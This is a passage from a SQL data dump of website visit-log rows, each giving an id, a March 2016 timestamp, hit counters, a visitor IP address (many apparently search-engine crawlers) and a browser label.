178.166','firefox'),(12707,1457018434,2,2,0,0,'157.55.39.85','other'),(12708,1457018451,1,0,1,0,'66.249.66.166',''),(12709,1457018462,1,1,0,0,'91.196.178.134','chrome'),(12710,1457018602,3,0,3,0,'68.180.229.232',''),(12711,1457019118,1,1,0,0,'195.211.173.229','chrome'),(12712,1457019365,3,0,3,0,'66.249.66.158',''),(12713,1457020123,1,1,0,0,'66.249.93.86','other'),(12714,1457020193,1,1,0,0,'217.69.133.29','other'),(12715,1457020555,1,0,1,0,'66.249.66.162',''),(12716,1457020558,1,0,1,0,'68.180.229.232',''),(12717,1457021274,2,1,1,0,'66.249.66.190',''),(12718,1457021343,4,4,0,0,'178.154.149.11','other'),(12720,1457021345,3,3,0,0,'141.8.184.18','other'),(12721,1457021686,1,1,0,0,'141.8.132.66','other'),(12722,1457021687,1,1,0,0,'5.255.253.89','other'),(12723,1457021688,1,1,0,0,'130.193.51.22','other'),(12724,1457021689,1,1,0,0,'130.193.37.21','other'),(12725,1457021690,1,1,0,0,'141.8.132.99','other'),(12726,1457021743,1,0,1,0,'66.249.66.133',''),(12727,1457021935,1,1,0,0,'207.46.13.188','other'),(12728,1457021998,3,2,1,0,'66.249.66.162',''),(12729,1457022076,1,1,0,0,'66.249.66.190','other'),(12730,1457022370,1,1,0,0,'66.249.92.95','other'),(12731,1457022385,4,2,2,0,'66.249.66.158',''),(12732,1457022921,1,0,1,0,'66.249.66.166',''),(12733,1457023141,2,2,0,0,'141.8.183.14','other'),(12735,1457023142,3,3,0,0,'93.158.152.9','other'),(12736,1457023409,1,1,0,0,'141.8.184.11','other'),(12737,1457023410,1,1,0,0,'141.8.142.10','other'),(12738,1457023619,1,1,0,0,'141.8.184.18','other'),(12739,1457023649,2,0,2,0,'66.249.66.162',''),(12740,1457023786,1,1,0,0,'194.0.131.173','other'),(12741,1457023886,3,3,0,0,'66.249.66.162','other'),(12742,1457023897,2,2,0,0,'66.249.66.190','other'),(12743,1457023923,2,1,1,0,'66.249.66.166',''),(12744,1457024077,2,1,1,0,'66.249.66.158',''),(12745,1457024239,1,1,0,0,'66.249.66.158','other'),(12746,1457024680,1,1,0,0,'194.0.131.189','other'),(12747,1457024709,1,1,0,0,'194.0.131.173','other'),(12748,1457024882,1,1,0,0,'207.46.13.188','other'),(12749,1457024928,2,1,1,0,'66.249.66.162',''),(12750,1457024964,15,15,0,0,'82.193.127.15','other'),(12751,1457024968,1,1,0,0,'66.249.66.190','other'),(12752,1457025043,1,1,0,0,'8.29.198.25','other'),(12753,1457025051,2,1,1,0,'66.249.66.162',''),(12754,1457025087,2,2,0,0,'66.249.66.166','other'),(12755,1457025441,10,10,0,0,'178.154.149.11','other'),(12756,1457025442,8,8,0,0,'141.8.184.18','other'),(12757,1457025448,3,3,0,0,'141.8.183.14','other'),(12758,1457025504,3,2,1,0,'66.249.66.158',''),(12759,1457025624,1,1,0,0,'194.0.131.173','other'),(12760,1457025644,1,0,1,0,'66.249.66.133',''),(12761,1457025649,1,1,0,0,'194.0.131.159','other'),(12762,1457025724,1,1,0,0,'194.0.131.131','other'),(12763,1457025737,1,1,0,0,'194.0.131.139','other'),(12764,1457025995,2,2,0,0,'66.249.66.158','other'),(12765,1457026011,1,0,1,0,'66.249.66.162',''),(12766,1457026036,1,1,0,0,'194.0.131.140','other'),(12767,1457026083,4,4,0,0,'66.249.66.162','other'),(12768,1457026125,1,1,0,0,'194.0.131.167','other'),(12769,1457026266,1,1,0,0,'92.113.174.126','firefox'),(12770,1457026527,1,1,0,0,'194.0.131.173','other'),(12771,1457026538,296,296,0,0,'82.193.127.15','other'),(12772,1457026661,1,1,0,0,'95.133.21.57','chrome'),(12773,1457027012,2,1,1,0,'66.249.66.166',''),(12774,1457027031,1,1,0,0,'157.55.39.85','other'),(12775,1457027090,1,1,0,0,'194.0.131.184','other'),(12776,1457027334,1,1,0,0,'66.249.93.94','other'),(12777,1457027425,2,1,1,0,'66.249.66.166',''),(12778,1457027439,4,4,0,0,'82.193.127.15','other'),(12779,1457027460,1,1,0,0,'207.46.13.90','other'),(12780,1457027608,1,1,0,0,'92.113.174.126','firefox'),(12781,1457027666,3,1,2,0,'66.249.66.162',''),(12782,1457027827,2,0,2,0,'66.249.66.158',''),(12783,1457027982,3,1,2,0,'66.249.66.162',''),(12784,1457028309,3,1,2,0,'66.249.66.158',''),(12785,1457028327,1,1,0,0,'91.196.178.163','chrome'),(12786,1457028437,2,2,0,0,'66.249.66.166','other'),(12787,1457028505,2,2,0,0,'94.179.20.189','chrome'),(12788,1457028708,1,1,0,0,'216.163.188.231','firefox'),(12789,1457028908,1,1,0,0,'141.8.142.41','other'),(12791,1457028909,3,3,0,0,'141.8.132.99','other'),(12792,1457028910,2,2,0,0,'130.193.51.45','other'),(12793,1457028911,2,2,0,0,'141.8.184.11','other'),(12794,1457028912,1,1,0,0,'141.8.132.97','other'),(12795,1457028913,1,1,0,0,'5.255.253.55','other'),(12797,1457028914,1,1,0,0,'93.158.152.9','other'),(12798,1457028917,1,1,0,0,'5.255.253.110','other'),(12799,1457028918,1,1,0,0,'141.8.132.79','other'),(12801,1457028920,1,1,0,0,'5.255.253.10','other'),(12802,1457028921,1,1,0,0,'130.193.51.81','other'),(12803,1457028922,1,1,0,0,'141.8.142.88','other'),(12804,1457028923,1,1,0,0,'130.193.37.27','other'),(12805,1457028924,1,1,0,0,'178.154.149.11','other'),(12806,1457028925,1,1,0,0,'130.193.51.43','other'),(12807,1457028926,1,1,0,0,'93.158.152.26','other'),(12808,1457029335,1,1,0,0,'207.46.13.188','other'),(12809,1457029341,1,1,0,0,'66.102.9.104','firefox'),(12810,1457029358,1,1,0,0,'66.249.66.162','other'),(12811,1457029519,2,1,1,0,'66.249.66.158',''),(12812,1457029653,2,1,1,0,'66.249.66.158',''),(12813,1457030162,1,1,0,0,'141.8.142.41','other'),(12814,1457030163,1,1,0,0,'130.193.51.85','other'),(12815,1457030164,1,1,0,0,'5.255.253.79','other'),(12816,1457030211,1,1,0,0,'91.196.178.71','firefox'),(12817,1457030257,2,2,0,0,'66.249.66.166','other'),(12818,1457030276,1,1,0,0,'66.249.66.162','other'),(12819,1457030564,2,2,0,0,'157.55.39.85','other'),(12820,1457030670,1,0,1,0,'66.249.66.133',''),(12821,1457030693,3,2,1,0,'66.249.66.158',''),(12822,1457030773,1,1,0,0,'92.113.174.126','firefox'),(12823,1457030818,2,2,0,0,'141.8.184.18','other'),(12824,1457030819,3,3,0,0,'141.8.132.99','other'),(12826,1457030959,1,1,0,0,'66.249.93.94','other'),(12827,1457031053,5,5,0,0,'5.255.253.110','other'),(12828,1457031054,2,2,0,0,'130.193.37.27','other'),(12829,1457031056,1,1,0,0,'5.255.253.100','other'),(12830,1457031057,1,1,0,0,'141.8.142.10','other'),(12831,1457031058,1,1,0,0,'141.8.132.97','other'),(12832,1457031059,3,3,0,0,'178.154.149.9','other'),(12833,1457031062,2,2,0,0,'141.8.184.22','other'),(12834,1457031063,3,3,0,0,'141.8.142.8','other'),(12835,1457031064,1,1,0,0,'130.193.51.91','other'),(12836,1457031065,2,2,0,0,'141.8.184.11','other'),(12837,1457031068,2,2,0,0,'130.193.51.50','other'),(12838,1457031069,1,1,0,0,'5.255.253.53','other'),(12840,1457031072,1,1,0,0,'141.8.142.41','other'),(12841,1457031073,2,2,0,0,'130.193.51.45','other'),(12842,1457031074,1,1,0,0,'5.255.253.9','other'),(12843,1457031078,2,2,0,0,'141.8.132.2','other'),(12844,1457031081,1,1,0,0,'141.8.132.79','other'),(12845,1457031083,1,1,0,0,'130.193.37.21','other'),(12846,1457031926,3,2,1,0,'66.249.66.162',''),(12847,1457031955,2,2,0,0,'66.249.66.129','other'),(12848,1457032474,2,1,1,0,'66.249.66.166',''),(12849,1457032539,1,1,0,0,'141.8.142.10','other'),(12850,1457032554,4,1,3,0,'66.249.66.158',''),(12851,1457032860,1,1,0,0,'144.76.8.132','other'),(12852,1457033303,1,1,0,0,'141.8.142.60','other'),(12853,1457033375,3,1,2,0,'66.249.66.158',''),(12854,1457033491,1,1,0,0,'66.249.92.99','other'),(12855,1457033549,1,1,0,0,'141.8.132.2','other'),(12856,1457033824,1,1,0,0,'207.46.13.93','other'),(12857,1457034272,4,3,1,0,'66.249.66.158',''),(12858,1457034373,1,0,1,0,'66.249.66.133',''),(12859,1457034410,1,1,0,0,'141.8.142.88','other'),(12860,1457034559,2,1,1,0,'66.249.66.162',''),(12861,1457035030,1,1,0,0,'136.243.172.46','chrome'),(12862,1457035041,2,1,1,0,'66.249.66.158',''),(12863,1457035123,1,1,0,0,'157.55.39.85','other'),(12864,1457035165,2,2,0,0,'66.249.66.158','other'),(12865,1457035425,1,1,0,0,'91.196.178.134','chrome'),(12866,1457035488,1,1,0,0,'141.8.132.99','other'),(12867,1457035902,1,1,0,0,'8.29.198.25','other'),(12868,1457036603,1,1,0,0,'141.8.142.10','other'),(12869,1457036604,1,1,0,0,'130.193.51.102','other'),(12870,1457036605,1,1,0,0,'130.193.51.22','other'),(12871,1457037338,1,0,1,0,'66.249.66.162',''),(12872,1457037397,2,0,2,0,'68.180.229.232',''),(12873,1457037605,1,0,1,0,'66.249.66.166',''),(12874,1457037736,1,0,1,0,'66.249.66.158',''),(12875,1457038031,1,1,0,0,'141.8.132.97','other'),(12876,1457038300,1,1,0,0,'66.249.93.94','other'),(12877,1457038592,2,1,1,0,'66.249.66.158',''),(12878,1457038753,2,2,0,0,'141.8.183.14','other'),(12880,1457039386,1,0,1,0,'66.249.66.162',''),(12881,1457039538,2,2,0,0,'93.158.152.9','other'),(12882,1457039551,1,1,0,0,'141.8.184.18','other'),(12883,1457039552,2,2,0,0,'5.255.253.53','other'),(12884,1457039553,2,2,0,0,'5.255.253.100','other'),(12885,1457039563,2,2,0,0,'178.154.149.11','other'),(12886,1457039623,1,1,0,0,'66.249.66.162','other'),(12887,1457039752,1,0,1,0,'66.249.66.166',''),(12888,1457039922,1,1,0,0,'91.233.90.16','chrome'),(12889,1457039923,2,2,0,0,'66.249.66.166','other'),(12890,1457040403,1,1,0,0,'94.179.29.18','chrome'),(12891,1457040486,1,0,1,0,'66.249.66.133',''),(12892,1457040568,2,2,0,0,'207.46.13.93','other'),(12893,1457040602,1,0,1,0,'68.180.229.232',''),(12894,1457040695,1,1,0,0,'82.207.113.219','chrome'),(12895,1457040749,1,1,0,0,'141.8.184.18','other'),(12896,1457040750,2,2,0,0,'141.8.183.14','other'),(12897,1457040751,1,1,0,0,'130.193.37.21','other'),(12898,1457040752,1,1,0,0,'130.193.51.45','other'),(12899,1457040753,1,1,0,0,'130.193.51.43','other'),(12901,1457040755,1,1,0,0,'5.255.253.9','other'),(12903,1457040756,1,1,0,0,'130.193.51.102','other'),(12904,1457040757,1,1,0,0,'141.8.142.88','other'),(12905,1457040758,1,1,0,0,'141.8.132.76','other'),(12907,1457040759,1,1,0,0,'141.8.142.41','other'),(12908,1457041118,1,0,1,0,'66.249.66.162',''),(12909,1457041223,1,1,0,0,'66.249.66.162','other'),(12910,1457041679,1,0,1,0,'66.249.66.133',''),(12911,1457041814,1,1,0,0,'66.249.93.90','other'),(12912,1457042320,2,1,1,0,'66.249.66.166',''),(12913,1457042364,1,1,0,0,'207.46.13.188','other'),(12914,1457042545,2,2,0,0,'141.8.183.14','other'),(12916,1457042801,1,1,0,0,'66.249.66.190','other'),(12917,1457042855,1,1,0,0,'178.154.149.11','other'),(12918,1457043110,1,1,0,0,'66.249.66.162','other'),(12919,1457043452,1,0,1,0,'66.249.66.129',''),(12920,1457043712,2,2,0,0,'66.249.66.158','other'),(12921,1457043997,1,1,0,0,'207.46.13.90','other'),(12922,1457044655,3,3,0,0,'66.249.66.166','other'),(12923,1457044741,1,1,0,0,'66.249.92.99','other'),(12924,1457045001,2,2,0,0,'77.232.164.65','chrome'),(12925,1457045116,2,1,1,0,'66.249.66.158',''),(12926,1457045197,3,3,0,0,'141.8.142.41','other'),(12927,1457045198,1,1,0,0,'130.193.51.85','other'),(12928,1457045199,1,1,0,0,'141.8.142.8','other'),(12929,1457045501,1,1,0,0,'130.193.37.27','other'),(12930,1457045592,1,0,1,0,'66.249.66.162',''),(12931,1457045800,1,0,1,0,'66.249.66.166',''),(12932,1457046008,1,1,0,0,'130.193.51.45','other'),(12933,1457046567,1,1,0,0,'217.69.143.45','other'),(12934,1457046739,5,5,0,0,'69.197.177.50','other'),(12935,1457046749,1,1,0,0,'8.29.198.26','other'),(12936,1457046750,1,1,0,0,'66.249.66.166','other'),(12937,1457046884,3,3,0,0,'82.193.127.15','other'),(12938,1457046983,1,1,0,0,'157.55.39.85','other'),(12939,1457047519,2,2,0,0,'66.249.66.158','other'),(12940,1457047607,1,1,0,0,'130.193.51.7','other'),(12941,1457048197,3,3,0,0,'82.193.127.15','other'),(12942,1457048311,2,1,1,0,'66.249.66.162',''),(12943,1457048559,3,0,3,0,'66.249.66.166',''),(12944,1457048563,2,1,1,0,'66.249.66.162',''),(12945,1457048861,8,1,7,0,'66.249.66.158',''),(12946,1457049376,2,0,2,0,'66.249.66.190',''),(12947,1457049476,2,0,2,0,'66.249.66.162',''),(12948,1457049499,1,1,0,0,'178.154.189.6','other'),(12950,1457049500,1,1,0,0,'5.255.253.110','other'),(12951,1457049501,1,1,0,0,'5.255.253.55','other'),(12952,1457049502,1,1,0,0,'130.193.51.85','other'),(12953,1457049504,1,1,0,0,'141.8.183.14','other'),(12955,1457049875,1,0,1,0,'68.180.229.232',''),(12956,1457049876,2,2,0,0,'66.249.66.158','other'),(12957,1457049912,5,5,0,0,'94.154.239.69','other'),(12958,1457050209,1,1,0,0,'217.69.143.68','other'),(12959,1457050328,1,1,0,0,'120.198.231.21','chrome'),(12960,1457050359,2,2,0,0,'115.159.183.200','other'),(12961,1457050373,48,48,0,0,'144.76.8.132','other'),(12962,1457050375,1,1,0,0,'174.143.201.164','chrome'),(12963,1457050587,4,4,0,0,'195.154.187.115','other'),(12964,1457050639,1,1,0,0,'66.249.66.162','other'),(12965,1457051415,1,0,1,0,'66.249.66.166',''),(12966,1457051554,1,1,0,0,'66.249.66.162','other'),(12967,1457051686,1,1,0,0,'141.8.132.97','other'),(12968,1457051691,1,1,0,0,'141.8.142.88','other'),(12969,1457051696,1,1,0,0,'5.255.253.51','other'),(12970,1457051699,1,1,0,0,'141.8.142.55','other'),(12971,1457051704,1,1,0,0,'93.158.152.26','other'),(12972,1457051708,1,1,0,0,'130.193.51.81','other'),(12973,1457051844,2,2,0,0,'207.46.13.188','other'),(12974,1457051848,2,2,0,0,'66.249.66.158','other'),(12975,1457051860,1,1,0,0,'217.69.133.226','other'),(12976,1457052052,3,3,0,0,'94.154.239.69','other'),(12977,1457052690,1,1,0,0,'157.55.39.174','other'),(12978,1457052849,2,2,0,0,'66.249.66.158','other'),(12979,1457053206,2,2,0,0,'141.8.132.99','other'),(12980,1457053210,1,1,0,0,'141.8.142.88','other'),(12981,1457053214,1,1,0,0,'141.8.142.8','other'),(12982,1457053219,1,1,0,0,'5.255.253.94','other'),(12983,1457053223,1,1,0,0,'141.8.132.109','other'),(12984,1457053227,3,3,0,0,'141.8.132.74','other'),(12985,1457053231,1,1,0,0,'93.158.152.65','other'),(12986,1457053240,1,1,0,0,'141.8.142.10','other'),(12987,1457053244,1,1,0,0,'141.8.184.22','other'),(12988,1457053248,1,1,0,0,'5.255.253.110','other'),(12989,1457053253,1,1,0,0,'141.8.132.76','other'),(12990,1457053257,1,1,0,0,'178.154.189.6','other'),(12991,1457053261,1,1,0,0,'141.8.142.55','other'),(12992,1457053270,1,1,0,0,'130.193.51.55','other'),(12993,1457053613,1,1,0,0,'178.154.189.12','other'),(12994,1457053617,1,1,0,0,'5.255.253.55','other'),(12995,1457053790,1,0,1,0,'66.249.66.166',''),(12996,1457054042,2,1,1,0,'66.249.66.158',''),(12997,1457054191,2,1,1,0,'66.249.66.166',''),(12998,1457054439,3,1,2,0,'66.249.66.158',''),(12999,1457054866,2,0,2,0,'66.249.66.162',''),(13000,1457054941,1,1,0,0,'157.55.39.85','other'),(13001,1457054961,1,1,0,0,'66.249.66.162','other'),(13002,1457055004,2,1,1,0,'66.249.66.158',''),(13003,1457055439,3,1,2,0,'66.249.66.166',''),(13004,1457055804,1,1,0,0,'141.8.183.14','other'),(13005,1457055851,1,1,0,0,'66.249.92.99','other'),(13006,1457056557,1,1,0,0,'66.249.66.158','other'),(13007,1457056835,2,0,2,0,'66.249.66.166',''),(13008,1457056884,1,1,0,0,'62.210.215.100','chrome'),(13009,1457056885,1,1,0,0,'178.33.169.6','chrome'),(13010,1457056894,2,0,2,0,'66.249.66.162',''),(13011,1457057295,1,1,0,0,'180.76.15.24','other'),(13012,1457057302,4,4,0,0,'141.8.184.18','other'),(13013,1457057593,1,1,0,0,'8.29.198.26','other'),(13014,1457057625,2,2,0,0,'51.254.130.58','other'),(13015,1457057721,1,1,0,0,'141.8.183.14','other'),(13016,1457057842,1,1,0,0,'207.46.13.90','other'),(13017,1457058378,1,0,1,0,'66.249.66.162',''),(13018,1457058768,1,1,0,0,'157.55.39.85','other'),(13019,1457058982,2,2,0,0,'5.255.253.53','other'),(13020,1457058986,2,2,0,0,'93.158.152.26','other'),(13021,1457058990,1,1,0,0,'130.193.51.102','other'),(13022,1457058995,1,1,0,0,'141.8.183.14','other'),(13023,1457059391,2,2,0,0,'141.8.184.11','other'),(13024,1457059396,2,2,0,0,'93.158.152.9','other'),(13025,1457059400,2,2,0,0,'178.154.149.11','other'),(13026,1457059404,1,1,0,0,'5.255.253.30','other'),(13027,1457059417,1,1,0,0,'5.255.253.55','other'),(13028,1457059425,1,1,0,0,'130.193.37.27','other'),(13029,1457059430,1,1,0,0,'141.8.132.97','other'),(13030,1457059434,1,1,0,0,'130.193.51.45','other'),(13031,1457059443,1,1,0,0,'5.255.253.110','other'),(13032,1457059878,1,1,0,0,'66.249.66.129','other'),(13033,1457059891,3,1,2,0,'66.249.66.158',''),(13034,1457059904,5,2,3,0,'66.249.66.162',''),(13035,1457060292,3,0,3,0,'66.249.66.166',''),(13036,1457060379,1,1,0,0,'207.46.13.188','other'),(13037,1457060852,1,1,0,0,'141.8.183.14','other'),(13038,1457060856,1,1,0,0,'130.193.37.21','other'),(13039,1457060860,1,1,0,0,'130.193.51.45','other'),(13040,1457060864,1,1,0,0,'130.193.51.43','other'),(13041,1457060869,1,1,0,0,'141.8.132.2','other'),(13042,1457060909,2,0,2,0,'66.249.66.158',''),(13043,1457061023,1,0,1,0,'66.249.66.190',''),(13044,1457062071,1,0,1,0,'68.180.229.232',''),(13045,1457062093,2,0,2,0,'66.249.66.166',''),(13046,1457062126,2,0,2,0,'66.249.66.190',''),(13047,1457062159,3,0,3,0,'66.249.66.162',''),(13048,1457062172,15,0,15,0,'66.249.66.158',''),(13049,1457062875,4,0,4,0,'66.249.66.129',''),(13050,1457062900,2,2,0,0,'157.55.39.174','other'),(13051,1457063100,20,0,20,0,'66.249.66.158',''),(13052,1457063220,5,0,5,0,'66.249.66.133',''),(13053,1457063614,2,1,1,0,'66.249.66.162',''),(13054,1457063762,7,1,6,0,'66.249.66.158',''),(13055,1457063852,1,0,1,0,'66.249.66.129',''),(13056,1457064010,1,0,1,0,'66.249.66.190',''),(13057,1457064055,4,2,2,0,'66.249.66.158',''),(13058,1457064165,2,1,1,0,'66.249.66.158',''),(13059,1457064178,5,3,2,0,'66.249.66.129',''),(13060,1457064184,1,1,0,0,'157.55.39.85','other'),(13061,1457064620,13,13,0,0,'80.91.162.99','other'),(13062,1457064666,1,0,1,0,'66.249.66.133',''),(13063,1457064739,2,2,0,0,'66.249.66.166','other'),(13064,1457064788,3,0,3,0,'66.249.66.162',''),(13065,1457064798,2,1,1,0,'66.249.66.158',''),(13066,1457065064,2,2,0,0,'66.249.66.190','other'),(13067,1457065075,2,2,0,0,'66.249.66.158','other'),(13068,1457065187,1,1,0,0,'207.46.13.188','other'),(13069,1457065213,4,4,0,0,'66.249.66.162','other'),(13070,1457065294,1,1,0,0,'37.9.122.201','other'),(13071,1457065753,14,14,0,0,'178.154.189.204','other'),(13072,1457066541,1,1,0,0,'66.249.92.99','other'),(13073,1457066548,1,0,1,0,'66.249.66.162',''),(13074,1457066550,2,2,0,0,'66.249.66.162','other'),(13075,1457066616,1,1,0,0,'93.158.152.9','other'),(13076,1457066618,1,1,0,0,'141.8.183.14','other'),(13077,1457066746,1,1,0,0,'141.8.132.2','other'),(13078,1457066757,1,1,0,0,'130.193.51.43','other'),(13079,1457066843,1,1,0,0,'66.249.66.190','other'),(13080,1457066853,3,3,0,0,'66.249.66.158','other'),(13081,1457066936,1,1,0,0,'157.55.39.174','other'),(13082,1457066963,1,1,0,0,'37.52.20.184','chrome'),(13083,1457067798,4,0,4,0,'66.249.66.158',''),(13084,1457068137,2,0,2,0,'66.249.66.162',''),(13085,1457068417,1,1,0,0,'8.29.198.25','other'),(13086,1457068453,3,0,3,0,'66.249.66.166',''),(13087,1457069277,2,0,2,0,'66.249.66.162',''),(13088,1457069958,1,1,0,0,'66.249.66.162','other'),(13089,1457070207,1,0,1,0,'66.249.66.158',''),(13090,1457070329,1,0,1,0,'66.249.66.166',''),(13091,1457070594,1,0,1,0,'68.180.229.232',''),(13092,1457070630,1,1,0,0,'66.249.93.86','other'),(13093,1457071114,1,1,0,0,'180.76.15.7','other'),(13094,1457071149,1,0,1,0,'66.249.66.162',''),(13095,1457071171,2,1,1,0,'66.249.66.162',''),(13096,1457071275,1,1,0,0,'66.249.66.158','other'),(13097,1457071550,1,0,1,0,'68.180.229.232',''),(13098,1457072059,1,1,0,0,'66.249.66.162','other'),(13099,1457072093,1,1,0,0,'207.46.13.188','other'),(13100,1457072593,1,1,0,0,'91.196.178.72','chrome'),(13101,1457072887,1,1,0,0,'141.8.184.18','other'),(13102,1457072934,2,1,1,0,'66.249.66.158',''),(13103,1457073157,1,1,0,0,'91.196.178.69','firefox'),(13104,1457073233,1,1,0,0,'66.102.9.84','firefox'),(13105,1457073313,1,1,0,0,'66.249.66.162','other'),(13106,1457073429,1,1,0,0,'91.196.178.71','firefox'),(13107,1457073449,1,1,0,0,'207.46.13.90','other'),(13108,1457073902,1,1,0,0,'66.249.66.158','other'),(13109,1457074011,1,1,0,0,'66.249.93.90','firefox'),(13110,1457074206,1,1,0,0,'66.249.93.90','other'),(13111,1457074241,3,1,2,0,'66.249.66.166',''),(13112,1457074254,1,0,1,0,'66.249.66.162',''),(13113,1457074302,1,1,0,0,'91.196.178.67','firefox'),(13114,1457074431,1,1,0,0,'195.211.173.229','chrome'),(13115,1457074628,1,1,0,0,'91.196.178.33','chrome'),(13116,1457074932,1,0,1,0,'66.249.66.190',''),(13117,1457074980,2,0,2,0,'66.249.66.158',''),(13118,1457075159,1,0,1,0,'66.249.66.162',''),(13119,1457075181,1,1,0,0,'66.249.66.158','other'),(13120,1457075313,1,1,0,0,'66.249.66.166','other'),(13121,1457075665,1,1,0,0,'91.196.178.65','chrome'),(13122,1457075855,1,1,0,0,'94.179.65.79','firefox'),(13123,1457076051,1,1,0,0,'207.46.13.188','other'),(13124,1457076218,1,0,1,0,'66.249.66.158',''),(13125,1457076353,2,0,2,0,'66.249.66.129',''),(13126,1457076556,3,3,0,0,'82.193.127.15','other'),(13127,1457076702,1,1,0,0,'66.249.66.162','other'),(13128,1457076713,1,1,0,0,'78.111.185.85','firefox'),(13129,1457076902,1,1,0,0,'141.8.184.18','other'),(13130,1457076905,1,0,1,0,'68.180.229.232',''),(13131,1457077031,1,1,0,0,'66.249.92.95','other'),(13132,1457077047,1,1,0,0,'91.124.14.232','firefox'),(13133,1457077251,1,1,0,0,'180.76.15.19','other'),(13134,1457077742,1,1,0,0,'91.196.178.131','chrome'),(13135,1457077863,2,1,1,0,'66.249.66.158',''),(13136,1457077915,2,0,2,0,'66.249.66.162',''),(13137,1457078103,1,0,1,0,'66.249.66.190',''),(13138,1457078415,2,2,0,0,'141.8.184.18','other'),(13139,1457078481,96,96,0,0,'80.91.162.99','other'),(13140,1457078715,2,2,0,0,'82.193.127.15','other'),(13141,1457078808,1,0,1,0,'68.180.229.232',''),(13142,1457078888,1,1,0,0,'62.210.215.100','chrome'),(13143,1457078923,2,0,2,0,'66.249.66.162',''),(13144,1457079196,1,1,0,0,'37.73.251.240','chrome'),(13145,1457079228,1,1,0,0,'94.179.3.54','chrome'),(13146,1457079244,1,1,0,0,'8.29.198.26','other'),(13147,1457079286,1,1,0,0,'66.249.66.129','other'),(13148,1457079552,1,1,0,0,'66.249.66.162','other'),(13149,1457079662,1,1,0,0,'37.53.228.248','chrome'),(13150,1457079847,131,131,0,0,'141.8.184.18','other'),(13151,1457079852,111,111,0,0,'178.154.149.11','other'),(13152,1457080034,1,1,0,0,'5.255.253.100','other'),(13153,1457080041,52,52,0,0,'141.8.183.14','other'),(13154,1457080299,1,1,0,0,'194.187.106.118','chrome'),(13155,1457080389,14,14,0,0,'5.255.253.53','other'),(13156,1457080391,30,30,0,0,'93.158.152.9','other'),(13157,1457080392,5,5,0,0,'130.193.37.21','other'),(13158,1457080518,1,1,0,0,'66.249.66.166','other'),(13159,1457080748,25,25,0,0,'141.8.184.18','other'),(13160,1457080757,27,27,0,0,'178.154.149.11','other'),(13161,1457080761,1,1,0,0,'207.46.13.90','other'),(13162,1457080944,1,1,0,0,'178.154.189.204','other'),(13163,1457081073,1,0,1,0,'66.249.66.158',''),(13164,1457081156,1,1,0,0,'112.90.78.22','other'),(13165,1457081160,2,1,1,0,'66.249.66.158',''),(13166,1457081421,1,1,0,0,'66.249.93.94','other'),(13167,1457081464,16,16,0,0,'130.193.37.21','other'),(13168,1457081465,5,5,0,0,'5.255.253.100','other'),(13169,1457081502,12,12,0,0,'141.8.183.14','other'),(13170,1457081567,1,0,1,0,'66.249.66.133',''),(13171,1457081572,1,0,1,0,'66.249.66.190',''),(13172,1457081601,1,0,1,0,'66.249.66.129',''),(13173,1457081609,8,8,0,0,'93.158.152.9','other'),(13174,1457081611,10,10,0,0,'141.8.132.99','other'),(13175,1457081625,17,17,0,0,'5.255.253.53','other'),(13176,1457081669,24,24,0,0,'178.154.149.11','other'),(13177,1457081738,29,29,0,0,'141.8.184.18','other'),(13178,1457081889,2,0,2,0,'66.249.66.162',''),(13179,1457082056,2,1,1,0,'66.249.66.133',''),(13180,1457082100,1,1,0,0,'91.196.178.99','chrome'),(13181,1457082151,2,2,0,0,'66.249.66.166','other'),(13182,1457082240,1,0,1,0,'66.249.66.158',''),(13183,1457082400,1,1,0,0,'91.196.178.65','chrome'),(13184,1457082561,11,11,0,0,'93.158.152.9','other'),(13185,1457082562,9,9,0,0,'5.255.253.53','other'),(13186,1457082575,22,22,0,0,'141.8.183.14','other'),(13187,1457082577,14,14,0,0,'130.193.37.21','other'),(13188,1457082579,23,23,0,0,'178.154.149.11','other'),(13189,1457082580,8,8,0,0,'141.8.132.99','other'),(13190,1457082670,24,24,0,0,'141.8.184.18','other'),(13191,1457082812,4,4,0,0,'5.255.253.100','other'),(13192,1457082979,1,1,0,0,'94.179.65.79','firefox'),(13193,1457083060,1,1,0,0,'91.196.178.71','firefox'),(13194,1457083190,1,1,0,0,'46.201.240.112','firefox'),(13195,1457083375,2,2,0,0,'66.249.66.158','other'),(13196,1457083383,1,0,1,0,'66.249.66.166',''),(13197,1457083665,15,15,0,0,'141.8.183.14','other'),(13198,1457083666,16,16,0,0,'141.8.184.18','other'),(13199,1457083878,13,13,0,0,'93.158.152.9','other'),(13200,1457083968,17,17,0,0,'178.154.149.11','other'),(13201,1457084009,1,0,1,0,'66.249.66.162',''),(13202,1457084016,8,8,0,0,'5.255.253.53','other'),(13203,1457084017,8,8,0,0,'130.193.37.21','other'),(13204,1457084026,7,7,0,0,'141.8.132.99','other'),(13205,1457084034,1,1,0,0,'94.179.65.79','firefox'),(13206,1457084097,2,2,0,0,'5.255.253.100','other'),(13207,1457084288,1,1,0,0,'207.46.13.5','other'),(13208,1457084581,6,6,0,0,'141.8.184.18','other'),(13209,1457084582,5,5,0,0,'141.8.183.14','other'),(13210,1457084896,1,0,1,0,'66.249.66.158',''),(13211,1457085050,1,1,0,0,'95.132.62.90','chrome'),(13212,1457085065,1,1,0,0,'66.249.66.129','other'),(13213,1457085161,1,0,1,0,'68.180.229.232',''),(13214,1457085180,1,1,0,0,'66.249.93.86','other'),(13215,1457085199,6,6,0,0,'178.154.149.11','other'),(13216,1457085231,2,2,0,0,'93.158.152.9','other'),(13217,1457085288,1,1,0,0,'66.249.66.166','other'),(13218,1457085289,3,3,0,0,'5.255.253.53','other'),(13219,1457085570,7,7,0,0,'141.8.183.14','other'),(13220,1457085863,1,1,0,0,'180.76.15.11','other'),(13221,1457086039,2,0,2,0,'66.249.66.158',''),(13222,1457086060,13,13,0,0,'141.8.184.18','other'),(13223,1457086177,3,3,0,0,'93.158.152.9','other'),(13224,1457086314,5,5,0,0,'178.154.149.11','other'),(13225,1457086380,3,3,0,0,'141.8.132.99','other'),(13226,1457086383,2,2,0,0,'91.196.178.71','firefox'),(13227,1457086431,1,1,0,0,'5.255.253.53','other'),(13228,1457086519,4,4,0,0,'141.8.183.14','other'),(13229,1457086520,2,2,0,0,'130.193.37.21','other'),(13230,1457086521,1,1,0,0,'5.255.253.100','other'),(13233,1457086545,2,2,0,0,'66.249.66.158','other'),(13234,1457086886,1,1,0,0,'66.249.66.162','other'),(13235,1457086967,1,0,1,0,'66.249.66.166',''),(13236,1457087630,12,12,0,0,'93.158.152.9','other'),(13237,1457087682,1,1,0,0,'66.249.92.99','other'),(13238,1457087927,11,11,0,0,'141.8.184.18','other'),(13240,1457087930,14,14,0,0,'178.154.149.11','other'),(13241,1457087931,6,6,0,0,'5.255.253.53','other'),(13242,14